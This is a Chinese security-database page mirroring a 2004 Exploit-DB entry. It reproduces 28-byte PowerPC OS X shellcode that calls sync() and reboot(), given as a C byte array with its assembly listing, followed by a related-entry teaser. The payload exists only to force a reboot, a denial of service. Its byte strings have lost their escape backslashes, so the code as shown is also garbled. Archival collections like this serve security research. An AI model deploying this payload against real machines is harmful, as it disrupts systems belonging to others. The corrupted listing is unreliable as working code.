OSX/PPC – Reboot() Shellcode (28 bytes)

OSX/PPC – Reboot() Shellcode (28 bytes)

漏洞ID 1054647 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-OSX/PPC – Reboot() Shellcode (28 bytes)-安全小百科CVE编号 N/A
图片[2]-OSX/PPC – Reboot() Shellcode (28 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 OSX_PPC CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13483
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
PPC OSX/Darwin Shellcode by B-r00t. 2003.
Does sync() reboot();
See ASM below.
28 Bytes.
*/

char shellcode[] =
"x7cx63x1ax79"
"x39x40x01x70"
"x38x0axfexb4"
"x44xffxffx02"
"x60x60x60x60"
"x38x0axfexc7"
"x44xffxffx02";

int main (void) 
{
        __asm__("b _shellcode");
}

/*
; PPC OS X / Darwin Shellcode by B-r00t.
; sync() reboot().
; Simply reboots the machine! - Just 4 Fun! 
;
.globl _main
.text
_main:
        xor.    r3, r3, r3 
        li      r10, 368
        addi    r0, r10, -332
        .long   0x44ffff02
        .long   0x60606060
        addi    r0, r10, -313
        .long   0x44ffff02
*/

// milw0rm.com [2004-09-26]

相关推荐: HP Unspecified Local Socket Implementation Denial of Service Vulnerability

HP Unspecified Local Socket Implementation Denial of Service Vulnerability 漏洞ID 1099481 漏洞类型 Unknown 发布时间 2003-09-30 更新时间 2003-09-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享